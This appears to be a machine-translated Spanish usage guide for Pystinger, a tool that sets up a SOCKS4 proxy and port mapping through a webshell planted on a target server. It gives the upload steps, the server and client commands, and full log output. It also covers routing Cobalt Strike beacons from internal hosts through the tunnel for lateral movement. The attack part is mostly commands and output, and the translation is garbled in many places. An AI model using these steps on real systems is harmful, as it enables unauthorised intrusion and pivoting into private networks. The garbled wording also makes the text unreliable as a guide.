Pystinger equipo Proxy SOCK4 y La asignación de puertos a través de webshell. Puede ser utilizado directamente por Metasploit Framework, Viper y Cobalt Strike para sesiones en recorrido. Pystinger se desarrolló en Python y actualmente admite tres scripts de proxy: php, jsp (x) y aspx.
usar
Por ejemplo, suponga que el nombre de dominio del servidor es http://example.com: 8080 La dirección IP de la intranet de la intranet del servidor es 192.168.3.11
Proxy SOCK4
proxy.jsp
Sube al servidor de destino y asegúrate de que http://example.com:8080/proxy.jsp pueda entrar a él. Se devuelve la páginaUTF-8
stinger_server.exe
Sube al servidor de destino, AntSword ejecuta cmdstart D:/XXX/stinger_server.exe
iniciar servidor derecho
No huyas
D:/xxx/singer_server.exe
directamente provocará la desconexión de TCP
- Valer
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
en tu VPS - Verá la futuro salida
root @ kali: ~ # ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21: 12: 47,673 – INFO – 619 – Prueba de recital lugar …
2020-01-06 21: 12: 47,674 – INFO – 622 – Pase para escuchas locales
2020-01-06 21: 12: 47,674 – INFO – 623 – Socks4a en 127.0.0.1:60000
2020-01-06 21: 12: 47,674 – INFO – 628 – Revisión de WEBSHELL …
2020-01-06 21: 12: 47,681 – INFO – 631 – WEBSHELL Check Pass
2020-01-06 21: 12: 47,681 – INFO – 632 – http://example.com:8080/proxy.jsp
2020-01-06 21: 12: 47,682 – INFO – 637 – Controles REMOTE_SERVER …
2020-01-06 21: 12: 47,696 – INFO – 644 – paso de prueba REMOTE_SERVER
2020-01-06 21: 12: 47,696 – INFO – 645 – – Configuración del servidor –
2020-01-06 21: 12: 47,696 – INFO – 647 – client_address_list => []
2020-01-06 21: 12: 47,696 – INFO – 647 – SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21: 12: 47,696 – INFO – 647 – LOG_LEVEL => INFO
2020-01-06 21: 12: 47,697 – INFO – 647 – MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 647 – mirror_address_list => []
2020-01-06 21: 12: 47,697 – INFO – 647 – READ_BUFF_SIZE => 51200
2020-01-06 21: 12: 47,697 – INFO – 673 – DIRECCIÓN_DESTINO: 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 677 – SLEEP_TIME: 0.01
2020-01-06 21: 12: 47,697 – INFO – 679 – – Configuración RAT –
2020-01-06 21: 12: 47,697 – INFO – 681 – Handler / LISTEN debe escuchar 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 683 – La carga útil debe conectarse a 127.0.0.1:60020
2020-01-06 21: 12: 47,698 – ADVERTENCIA – 111 – Inicio del hilo de onda
2020-01-06 21: 12: 47,703 – ADVERTENCIA – 502 – El servidor socks4a se iniciará en 127.0.0.1:60000
2020-01-06 21: 12: 47,703 – ADVERTENCIA – 509 – Socks4a sagaz para aceptar
- Ahora has empezado uno socks4a proxy en VPS
127.0.0.1:60000
para la intranet deexample.com
. - Ahora el servidor de destino((
example.com
)127.0.0.1:60020
fue asignado al VPS127.0.0.1:60020
C.baliza de obaltstrike en recorrido para múltiples destinos
proxy.jsp
Sube al servidor de destino y asegúrate de que http://example.com:8080/proxy.jsp pueda entrar a él. Se devuelve la páginaUTF-8
stinger_server.exe
Sube al servidor de destino, AntSword ejecuta cmdstart D:/XXX/stinger_server.exe 192.168.3.11
para iniciar el servidor Pystinger (192.168.3.11 es la dirección IP de la intranet del objetivo)
192.168.3.11 puede cambiar a 0.0.0.0
- Valer
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
en tu VPS - Verá la futuro salida
root @ kali: ~ # ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21: 12: 47,673 – INFO – 619 – Prueba de recital lugar …
2020-01-06 21: 12: 47,674 – INFO – 622 – Pase para escuchas locales
2020-01-06 21: 12: 47,674 – INFO – 623 – Socks4a en 127.0.0.1:60000
2020-01-06 21: 12: 47,674 – INFO – 628 – Revisión de WEBSHELL …
2020-01-06 21: 12: 47,681 – INFO – 631 – WEBSHELL Check Pass
2020-01-06 21: 12: 47,681 – INFO – 632 – http://example.com:8080/proxy.jsp
2020-01-06 21: 12: 47,682 – INFO – 637 – Controles REMOTE_SERVER …
2020-01-06 21: 12: 47,696 – INFO – 644 – paso de prueba REMOTE_SERVER
2020-01-06 21: 12: 47,696 – INFO – 645 – – Configuración del servidor –
2020-01-06 21: 12: 47,696 – INFO – 647 – client_address_list => []
2020-01-06 21: 12: 47,696 – INFO – 647 – SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21: 12: 47,696 – INFO – 647 – LOG_LEVEL => INFO
2020-01-06 21: 12: 47,697 – INFO – 647 – MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21: 12: 47,697 – INFO – 647 – mirror_address_list => []
2020-01-06 21: 12: 47,697 – INFO – 647 – READ_BUFF_SIZE => 51200
2020-01-06 21: 12: 47,697 – INFO – 673 – DIRECCIÓN_DESTINO: 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 677 – SLEEP_TIME: 0.01
2020-01-06 21: 12: 47,697 – INFO – 679 – – Configuración RAT –
2020-01-06 21: 12: 47,697 – INFO – 681 – Handler / LISTEN debe escuchar 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 683 – La carga útil debe conectarse a 192.168.3.11:60020
2020-01-06 21: 12: 47,698 – ADVERTENCIA – 111 – Inicio del hilo de onda
2020-01-06 21: 12: 47,703 – ADVERTENCIA – 502 – El servidor socks4a se iniciará en 127.0.0.1:60000
2020-01-06 21: 12: 47,703 – ADVERTENCIA – 509 – Socks4a sagaz para aceptar
- Agregue asistente en Cobaltstrike, el puerto del asistente es
60020
(Puerto Handler / LISTEN enRAT CONFIG
de la salida), la dirección del asistente es192.168.3.11
- Genere datos de legatario, cárguelos en el destino y ejecútelos.
- Moviéndose de flanco a otros hosts, puede apuntar la carga útil a 192.168.3.11:60020 para poner la baliza en recorrido
Encabezado y proxy personalizados
- Si el webshell necesita configurar una cookie o una autorización, el encabezado de la solicitud se puede configurar usando el parámetro – header
--header "Authorization: XXXXXX,Cookie: XXXXX"
- Si es necesario entrar al webshell a través de un proxy, puede configurar el proxy a través del proxy
--proxy "socks5:127.0.0.1:1081"